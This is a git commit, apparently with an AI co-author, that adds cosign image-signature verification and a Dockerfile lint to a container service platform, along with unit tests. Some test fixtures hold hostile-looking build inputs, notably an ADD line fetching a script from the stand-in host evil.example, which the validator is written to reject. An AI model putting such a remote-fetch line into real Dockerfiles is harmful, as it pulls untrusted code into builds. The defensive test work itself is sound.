feat: secure build phase 1 — cosign cell-side image verification (warn default) + Dockerfile validation
Unit Tests / test (push) Successful in 13m28s

- config/cosign/cosign.pub: public verification key committed to repo (safe);
  cosign private key lives in /home/roof/.pic-secrets/ and is NEVER committed
- api/config_manager.py: image_verification config block (modes: off|warn|enforce,
  default: warn) so existing deployments are unaffected until images are signed
- api/service_composer.py: cosign verify before pull/up; enforce aborts the
  operation, warn logs and proceeds, off skips entirely; also fixes the prior
  unsafe proceed-on-pull-failure path
- api/service_store_manager.py: store-image digest requirement (warn default,
  reject under enforce)
- api/Dockerfile: cosign binary copied from the official cosign image
- docker-compose.yml: config/cosign/ bind-mounted into cell-api container
- install.sh: ensure/verify bundled cosign pubkey on new cell installs
- api/manifest_validator.py: validate_build_context() — Dockerfile lint
- tests: full coverage for config modes, composer verify paths, store digest
  guard, and validate_build_context

Verification defaults to warn so nothing breaks in production until images are
signed (phase 2). Private key stored outside git at /home/roof/.pic-secrets/.

Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
This commit is contained in:
2026-06-11 03:53:47 -04:00
parent 8d904b1b8f
commit 238db60702
12 changed files with 622 additions and 2 deletions
+36
View File
@@ -517,5 +517,41 @@ class TestEmailManagerApply(unittest.TestCase):
self.assertEqual(result['restarted'], [])
class TestImageVerificationConfig(unittest.TestCase):
"""image_verification config round-trip and warn-by-default behaviour."""
def setUp(self):
self.temp_dir = tempfile.mkdtemp()
self.config_file = os.path.join(self.temp_dir, 'cell_config.json')
self.data_dir = os.path.join(self.temp_dir, 'data')
os.makedirs(self.data_dir, exist_ok=True)
self.cm = ConfigManager(self.config_file, self.data_dir)
def tearDown(self):
shutil.rmtree(self.temp_dir)
def test_default_mode_is_warn(self):
self.assertEqual(self.cm.get_image_verification_mode(), 'warn')
self.assertEqual(self.cm.get_image_verification(), {'mode': 'warn'})
def test_set_and_get_round_trip(self):
for mode in ('off', 'warn', 'enforce'):
self.cm.set_image_verification_mode(mode)
self.assertEqual(self.cm.get_image_verification_mode(), mode)
def test_set_mode_persists_across_reload(self):
self.cm.set_image_verification_mode('enforce')
cm2 = ConfigManager(self.config_file, self.data_dir)
self.assertEqual(cm2.get_image_verification_mode(), 'enforce')
def test_invalid_mode_rejected(self):
with self.assertRaises(ValueError):
self.cm.set_image_verification_mode('paranoid')
def test_corrupt_section_falls_back_to_warn(self):
self.cm.configs['image_verification'] = {'mode': 'bogus'}
self.assertEqual(self.cm.get_image_verification_mode(), 'warn')
if __name__ == '__main__':
unittest.main()
+96
View File
@@ -22,8 +22,13 @@ from manifest_validator import (
validate_manifest,
validate_rendered_compose,
validate_provision_hook,
validate_build_context,
BUILD_CONTEXT_MAX_FILES,
BUILD_CONTEXT_MAX_BYTES,
)
_ALPINE_PINNED = 'alpine@sha256:' + 'b' * 64
# ---------------------------------------------------------------------------
# Helpers
@@ -1646,5 +1651,96 @@ class TestWriteComposeValidation(unittest.TestCase):
self.assertIn('security validation', str(ctx.exception))
class TestValidateBuildContext(unittest.TestCase):
"""Static Dockerfile lint (defense-in-depth)."""
def test_allowlisted_pinned_base_ok(self):
df = f'FROM {_ALPINE_PINNED}\nRUN echo hi\n'
ok, errs = validate_build_context(df)
self.assertTrue(ok, errs)
def test_unpinned_base_rejected(self):
ok, errs = validate_build_context('FROM alpine:3.19\n')
self.assertFalse(ok)
self.assertTrue(any('digest-pinned' in e for e in errs))
def test_non_allowlisted_base_rejected(self):
df = 'FROM evil/image@sha256:' + 'c' * 64 + '\n'
ok, errs = validate_build_context(df)
self.assertFalse(ok)
self.assertTrue(any('allowlist' in e for e in errs))
def test_from_scratch_rejected(self):
ok, errs = validate_build_context('FROM scratch\n')
self.assertFalse(ok)
self.assertTrue(any('scratch' in e for e in errs))
def test_multistage_alias_reference_ok(self):
df = (
f'FROM {_ALPINE_PINNED} AS builder\n'
'RUN echo build\n'
'FROM builder\n'
'RUN echo final\n'
)
ok, errs = validate_build_context(df)
self.assertTrue(ok, errs)
def test_add_remote_url_rejected(self):
df = f'FROM {_ALPINE_PINNED}\nADD https://evil.example/x.sh /x.sh\n'
ok, errs = validate_build_context(df)
self.assertFalse(ok)
self.assertTrue(any('remote URL' in e for e in errs))
def test_add_local_path_ok(self):
df = f'FROM {_ALPINE_PINNED}\nADD ./local.tar /opt/\n'
ok, errs = validate_build_context(df)
self.assertTrue(ok, errs)
def test_secret_named_arg_rejected(self):
df = f'FROM {_ALPINE_PINNED}\nARG GITHUB_TOKEN\n'
ok, errs = validate_build_context(df)
self.assertFalse(ok)
self.assertTrue(any('ARG' in e for e in errs))
def test_secret_named_env_rejected(self):
df = f'FROM {_ALPINE_PINNED}\nENV API_SECRET=abc\n'
ok, errs = validate_build_context(df)
self.assertFalse(ok)
self.assertTrue(any('ENV' in e for e in errs))
def test_benign_arg_env_ok(self):
df = f'FROM {_ALPINE_PINNED}\nARG VERSION=1.0\nENV TZ=UTC\n'
ok, errs = validate_build_context(df)
self.assertTrue(ok, errs)
def test_no_from_rejected(self):
ok, errs = validate_build_context('RUN echo hi\n')
self.assertFalse(ok)
def test_empty_dockerfile_rejected(self):
ok, errs = validate_build_context('')
self.assertFalse(ok)
def test_oversized_context_rejected(self):
df = f'FROM {_ALPINE_PINNED}\n'
files = [('big.bin', BUILD_CONTEXT_MAX_BYTES + 1)]
ok, errs = validate_build_context(df, context_files=files)
self.assertFalse(ok)
self.assertTrue(any('too large' in e for e in errs))
def test_too_many_files_rejected(self):
df = f'FROM {_ALPINE_PINNED}\n'
files = [(f'f{i}', 1) for i in range(BUILD_CONTEXT_MAX_FILES + 1)]
ok, errs = validate_build_context(df, context_files=files)
self.assertFalse(ok)
self.assertTrue(any('too many files' in e for e in errs))
def test_small_context_ok(self):
df = f'FROM {_ALPINE_PINNED}\n'
files = [('Dockerfile', 100), ('entrypoint.sh', 500)]
ok, errs = validate_build_context(df, context_files=files)
self.assertTrue(ok, errs)
if __name__ == '__main__':
unittest.main()
+102
View File
@@ -773,5 +773,107 @@ class TestPerInstanceRender(unittest.TestCase):
self.assertEqual(ServiceComposer.instance_id_for('conn_a1b2c3d4'), 'a1b2c3d4')
# ── Image signature verification ───────────────────────────────────────────
_DIGEST = '@sha256:' + 'a' * 64
_SIGNED_IMAGE = 'git.pic.ngo/roof/foo' + _DIGEST
def _verify_composer(mode):
cm = _make_cm()
cm.get_image_verification_mode.return_value = mode
c = ServiceComposer(config_manager=cm, data_dir='/fake/data')
# Isolate verification from disk/docker: stub everything except verify logic.
c.write_compose = MagicMock(return_value='')
c.up = MagicMock(return_value={'ok': True})
c._store_cmd = MagicMock(return_value={'ok': True})
return c
class TestImageVerification(unittest.TestCase):
def test_off_mode_skips_cosign(self):
c = _verify_composer('off')
c._cosign_verify = MagicMock()
manifest = {'image': _SIGNED_IMAGE}
result = c.install('svc', manifest, 'tpl')
self.assertTrue(result['ok'])
c._cosign_verify.assert_not_called()
c.up.assert_called_once()
def test_good_signature_proceeds(self):
c = _verify_composer('enforce')
c._cosign_verify = MagicMock(return_value={'ok': True, 'stdout': '', 'stderr': ''})
manifest = {'image': _SIGNED_IMAGE}
result = c.install('svc', manifest, 'tpl')
self.assertTrue(result['ok'])
c._cosign_verify.assert_called_once()
c.up.assert_called_once()
def test_enforce_bad_signature_aborts(self):
c = _verify_composer('enforce')
c._cosign_verify = MagicMock(return_value={'ok': False, 'stderr': 'no matching signatures'})
manifest = {'image': _SIGNED_IMAGE}
result = c.install('svc', manifest, 'tpl')
self.assertFalse(result['ok'])
self.assertIn('verification failed', result['error'])
c.up.assert_not_called()
def test_warn_bad_signature_proceeds(self):
c = _verify_composer('warn')
c._cosign_verify = MagicMock(return_value={'ok': False, 'stderr': 'no matching signatures'})
manifest = {'image': _SIGNED_IMAGE}
result = c.install('svc', manifest, 'tpl')
self.assertTrue(result['ok'])
c.up.assert_called_once()
def test_enforce_undigested_image_aborts(self):
c = _verify_composer('enforce')
c._cosign_verify = MagicMock()
manifest = {'image': 'git.pic.ngo/roof/foo:latest'}
result = c.install('svc', manifest, 'tpl')
self.assertFalse(result['ok'])
self.assertIn('digest', result['error'])
c._cosign_verify.assert_not_called()
c.up.assert_not_called()
def test_warn_undigested_image_proceeds(self):
c = _verify_composer('warn')
c._cosign_verify = MagicMock()
manifest = {'image': 'git.pic.ngo/roof/foo:latest'}
result = c.install('svc', manifest, 'tpl')
self.assertTrue(result['ok'])
c._cosign_verify.assert_not_called()
c.up.assert_called_once()
def test_cosign_verify_builds_expected_command(self):
c = _verify_composer('enforce')
with patch.object(c, '_run', return_value={'ok': True}) as mock_run:
c._cosign_verify(_SIGNED_IMAGE)
cmd = mock_run.call_args[0][0]
self.assertEqual(cmd[0:2], ['cosign', 'verify'])
self.assertIn('--key', cmd)
self.assertIn(_SIGNED_IMAGE, cmd)
def test_enforce_pull_failure_aborts(self):
c = _verify_composer('enforce')
c._cosign_verify = MagicMock(return_value={'ok': True})
c._store_cmd = MagicMock(return_value={'ok': False, 'stderr': 'manifest unknown'})
manifest = {'image': _SIGNED_IMAGE}
result = c.install('svc', manifest, 'tpl')
self.assertFalse(result['ok'])
self.assertIn('pull failed', result['error'])
c.up.assert_not_called()
def test_warn_pull_failure_proceeds(self):
c = _verify_composer('warn')
c._cosign_verify = MagicMock(return_value={'ok': True})
c._store_cmd = MagicMock(return_value={'ok': False, 'stderr': 'manifest unknown'})
manifest = {'image': _SIGNED_IMAGE}
result = c.install('svc', manifest, 'tpl')
self.assertTrue(result['ok'])
c.up.assert_called_once()
if __name__ == '__main__':
unittest.main()
+34
View File
@@ -679,6 +679,40 @@ class TestInstall(unittest.TestCase):
self.assertTrue(result['ok'])
self.assertFalse(result.get('already_installed', False))
def test_install_enforce_rejects_undigested_image(self):
"""Under enforce mode a store image without @sha256: pin is fatal."""
manifest = _valid_manifest(
id='myapp', container_name='cell-myapp',
image='git.pic.ngo/roof/myapp:latest',
)
ssm, cm, _, composer = _make_ssm(manifest=manifest)
cm.get_image_verification_mode.return_value = 'enforce'
result = ssm.install('myapp')
self.assertFalse(result['ok'])
self.assertIn('digest', result['error'].lower())
composer.install.assert_not_called()
def test_install_warn_allows_undigested_image(self):
"""Under warn mode (default) an undigested image still installs."""
manifest = _valid_manifest(
id='myapp', container_name='cell-myapp',
image='git.pic.ngo/roof/myapp:latest',
)
ssm, cm, _, composer = _make_ssm(manifest=manifest)
cm.get_image_verification_mode.return_value = 'warn'
result = ssm.install('myapp')
self.assertTrue(result['ok'])
composer.install.assert_called_once()
def test_install_enforce_allows_digested_image(self):
"""Under enforce mode a properly digest-pinned image installs."""
manifest = _valid_manifest(id='myapp', container_name='cell-myapp')
ssm, cm, _, composer = _make_ssm(manifest=manifest)
cm.get_image_verification_mode.return_value = 'enforce'
result = ssm.install('myapp')
self.assertTrue(result['ok'])
composer.install.assert_called_once()
def test_install_without_composer_stores_record(self):
"""When service_composer=None, skip compose but still store the install record."""
manifest = _valid_manifest(id='myapp', container_name='cell-myapp')